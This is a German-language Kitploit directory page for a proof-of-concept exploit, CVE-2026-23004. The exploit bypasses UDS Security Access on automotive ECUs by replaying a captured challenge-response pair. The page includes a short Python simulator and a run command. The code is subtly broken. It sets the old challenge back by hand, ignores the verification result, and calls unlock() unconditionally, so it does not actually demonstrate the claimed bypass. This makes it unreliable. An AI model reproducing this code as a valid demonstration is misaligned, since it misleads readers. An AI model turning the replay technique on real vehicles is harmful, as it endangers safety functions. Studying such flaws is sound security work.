Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Proof-of-Concept-Exploit, der die Umgehung der UDS-Authentifizierung durch Challenge-Response-Replay an automobilen ECUs demonstriert, mit Python-CAN-UDS-Simulator. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Authentifizierung & AutorisierungEmbedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationPenetrationstestsHardware- & IoT-Sicherheit
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Proof-of-Concept-Exploit, der die Umgehung der UDS-Authentifizierung durch Challenge-Response-Replay an automobilen ECUs demonstriert, mit Python-CAN-UDS-Simulator.

Repository anzeigen
1vor 14 TagenNoch nicht geprüft

CVE-2026-23004 – Umgehung der UDS-Authentifizierung im Automobilbereich durch Replay-Angriff

Programmcode (Python-CAN‑UDS-Simulation)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Umgehung der UDS-Authentifizierung im Automobilbereich durch Replay

Severity: High

Übersicht

Ein Automotive-Steuergerät (ECU) implementiert den Sicherheitszugriff (Service 0x27) der Unified Diagnostic Services (UDS), erzwingt jedoch keine Einmalverwendung der Challenge. Ein Angreifer kann ein gültiges Challenge-Response-Paar aufzeichnen und es erneut abspielen, um die Authentifizierung zu umgehen.

Details zur Schwachstelle

  • Typ: Replay-Angriff
  • Auswirkung: Unautorisierte ECU-Programmierung, Außerkraftsetzen von Sicherheitsfunktionen.
  • Grundursache: Das Steuergerät akzeptiert jede Antwort, die zur aktuellen Challenge passt, jedoch kann dieselbe Challenge ohne Ungültigmachung wiederverwendet werden.

Exploit-Demonstration

Führen Sie die Simulation aus:

root@kitploit:~
python uds_sim.py

Das Steuergerät wird mit demselben Authentifizierungspaar zweimal entsperrt.

Tool herunterladen